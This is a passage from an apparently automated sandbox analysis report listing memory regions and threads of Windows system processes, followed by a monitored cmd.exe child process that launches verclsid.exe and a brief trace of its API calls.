monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4454
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4455
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4456
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4457
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4458
start_va = 0xff3f0000
end_va = 0xff3fafff
monitored = 0
entry_point = 0xff3f246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 4459
start_va = 0x7fef7c30000
end_va = 0x7fef7c50fff
monitored = 0
entry_point = 0x7fef7c403b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 4460
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 4461
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 4462
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 4463
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 4464
start_va = 0x7fef89a0000
end_va = 0x7fef89d1fff
monitored = 0
entry_point = 0x7fef89bca90
region_type = mapped_file
name = "wmidcprv.dll"
filename = "\\Windows\\System32\\wbem\\WmiDcPrv.dll" (normalized: "c:\\windows\\system32\\wbem\\wmidcprv.dll")
Region:
id = 4465
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 0
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 4466
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4467
start_va = 0x7fefbf00000
end_va = 0x7fefbf10fff
monitored = 0
entry_point = 0x7fefbf01070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 4468
start_va = 0x7fefce40000
end_va = 0x7fefcec0fff
monitored = 0
entry_point = 0x7fefce4cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4469
start_va = 0x7fefced0000
end_va = 0x7fefcedcfff
monitored = 0
entry_point = 0x7fefced1348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 4470
start_va = 0x7fefcee0000
end_va = 0x7fefcf0bfff
monitored = 0
entry_point = 0x7fefcee1860
region_type = mapped_file
name = "umpo.dll"
filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll")
Region:
id = 4471
start_va = 0x7fefcf10000
end_va = 0x7fefcf2afff
monitored = 0
entry_point = 0x7fefcf12068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 4472
start_va = 0x7fefcf30000
end_va = 0x7fefcf4dfff
monitored = 0
entry_point = 0x7fefcf313b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 4473
start_va = 0x7fefcf50000
end_va = 0x7fefcf61fff
monitored = 0
entry_point = 0x7fefcf51060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 4474
start_va = 0x7fefcf70000
end_va = 0x7fefcf8efff
monitored = 0
entry_point = 0x7fefcf75c68
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 4475
start_va = 0x7fefcf90000
end_va = 0x7fefcff6fff
monitored = 0
entry_point = 0x7fefcf9d320
region_type = mapped_file
name = "umpnpmgr.dll"
filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll")
Region:
id = 4476
start_va = 0x7fefd060000
end_va = 0x7fefd069fff
monitored = 0
entry_point = 0x7fefd063cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 4477
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4478
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 4479
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 4480
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4481
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4482
start_va = 0x7fefdb20000
end_va = 0x7fefdb5cfff
monitored = 0
entry_point = 0x7fefdb218f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 4483
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 4484
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4485
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4486
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 4487
start_va = 0x7fefdcf0000
end_va = 0x7fefdd2afff
monitored = 0
entry_point = 0x7fefdcf1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 4488
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4489
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 4490
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4491
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4492
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4493
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4494
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4495
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4496
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4497
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4498
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4499
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4500
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4501
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4502
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4503
start_va = 0x7feff990000
end_va = 0x7feffb66fff
monitored = 0
entry_point = 0x7feff991010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 4504
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4505
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4506
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4507
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4508
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 4509
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 4510
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 4511
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 4512
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 4513
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 4514
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 4515
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4516
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 4517
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4518
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4519
start_va = 0x7fffffd9000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 4520
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 4521
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 4522
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4535
start_va = 0x3c0000
end_va = 0x3cbfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 4981
start_va = 0x5e0000
end_va = 0x647fff
monitored = 0
entry_point = 0x61b450
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 5834
start_va = 0xdc0000
end_va = 0xe3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000dc0000"
filename = ""
Region:
id = 5835
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Thread:
id = 207
os_tid = 0x670
Thread:
id = 208
os_tid = 0x124
Thread:
id = 209
os_tid = 0x2ac
Thread:
id = 210
os_tid = 0x2a8
Thread:
id = 211
os_tid = 0x298
Thread:
id = 212
os_tid = 0x28c
Thread:
id = 213
os_tid = 0x288
Thread:
id = 214
os_tid = 0x284
Thread:
id = 215
os_tid = 0x280
Thread:
id = 216
os_tid = 0x274
Thread:
id = 217
os_tid = 0x26c
Thread:
id = 218
os_tid = 0x268
Thread:
id = 219
os_tid = 0x264
Thread:
id = 263
os_tid = 0x27c
Thread:
id = 283
os_tid = 0xc8
Process:
id = "29"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x676f8000"
os_pid = "0x5a8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "26"
os_parent_pid = "0x558"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c start \"\" verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} & Exit"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4569
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4570
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4571
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4572
start_va = 0x110000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 4573
start_va = 0x4a830000
end_va = 0x4a888fff
monitored = 1
entry_point = 0x4a8390b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 4574
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4575
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4576
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4577
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4578
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4579
start_va = 0x7fffffd9000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 4580
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4581
start_va = 0x210000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 4582
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4583
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4584
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4585
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4586
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4587
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 4588
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4589
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4590
start_va = 0x7fef7310000
end_va = 0x7fef7317fff
monitored = 0
entry_point = 0x7fef73111a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 4591
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4592
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4593
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4594
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4595
start_va = 0x210000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 4596
start_va = 0x3c0000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 4597
start_va = 0x210000
end_va = 0x30ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 4598
start_va = 0x330000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 4599
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4600
start_va = 0x4c0000
end_va = 0x647fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 4601
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4602
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4603
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4604
start_va = 0x650000
end_va = 0x7d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 4605
start_va = 0x7e0000
end_va = 0x1bdffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007e0000"
filename = ""
Region:
id = 4606
start_va = 0xc0000
end_va = 0xdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 4607
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 4608
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Thread:
id = 223
os_tid = 0x5b0
[0550.074] GetProcAddress (hModule=0x77b10000, lpProcName="SetConsoleInputExeNameW") returned 0x77b20c80
[0550.075] GetProcessHeap () returned 0x3c0000
[0550.075] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4012) returned 0x3dc610
[0550.075] GetProcessHeap () returned 0x3c0000
[0550.076] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dc610 | out: hHeap=0x3c0000) returned 1
[0550.077] _wcsicmp (_String1="start", _String2=")") returned 74
[0550.078] _wcsicmp (_String1="FOR", _String2="start") returned -13
[0550.078] _wcsicmp (_String1="FOR/?", _String2="start") returned -13
[0550.078] _wcsicmp (_String1="IF", _String2="start") returned -10
[0550.078] _wcsicmp (_String1="IF/?", _String2="start") returned -10
[0550.078] _wcsicmp (_String1="REM", _String2="start") returned -1
[0550.078] _wcsicmp (_String1="REM/?", _String2="start") returned -1
[0550.078] GetProcessHeap () returned 0x3c0000
[0550.078] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0) returned 0x3d9e40
[0550.078] GetProcessHeap () returned 0x3c0000
[0550.078] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1c) returned 0x3d4740
[0550.084] GetProcessHeap () returned 0x3c0000
[0550.084] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x94) returned 0x3d9f00
[0550.086] GetProcessHeap () returned 0x3c0000
[0550.086] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0) returned 0x3d9fa0
[0550.087] _wcsicmp (_String1="Exit", _String2=")") returned 60
[0550.087] _wcsicmp (_String1="FOR", _String2="Exit") returned 1
[0550.087] _wcsicmp (_String1="FOR/?", _String2="Exit") returned 1
[0550.087] _wcsicmp (_String1="IF", _String2="Exit") returned 4
